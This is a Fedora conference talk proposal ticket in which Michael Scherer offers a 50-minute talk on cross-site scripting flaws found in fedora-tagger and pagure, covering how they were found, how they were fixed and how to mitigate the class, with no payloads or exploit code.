#119 [Talk-50] The XSS Files, I want to believe
Opened 11 months ago by misc. Modified 9 months ago

  1. What is your proposal?

During a small security audit last year, several Cross Site Scripting (XSS) security issues have been found in 2 fedora hosted web applications (fedora-tagger, pagure). Based on those examples, this talk will explain the basics of XSS (injecting javascript in a webpage to take control of the browser), where to look for them, how they were fixed, and how to mitigate the whole class of vulnerabilities in the future.

The aim of this talk is to help people make Fedora infra (or others) safer, by improving understanding of this class of problem, and scaling the efforts around security audit. A basic understanding of python would help, but is not needed.

  1. Who in addition to the speaker needs to be in the room for this to succeed?
  • People who work on Fedora web application, or any python web app
  1. Is this a…
  • 50 minutes: Talk
  1. Anything else we need to know?

Regular A/V would be nice.

I do not plan to drop 0 days (or rather I have nothing to drop yet). I also do not plan to sing on stage.

  1. Who are you?
  • Name: Michael Scherer
  • FAS ID: misc
  • IRC Nick, if not FAS ID:

Metadata Update from @mattdm:
- Issue assigned to mattdm
- Issue tagged with: Talk In Consideration

9 months ago

Login to comment on this ticket.

Metadata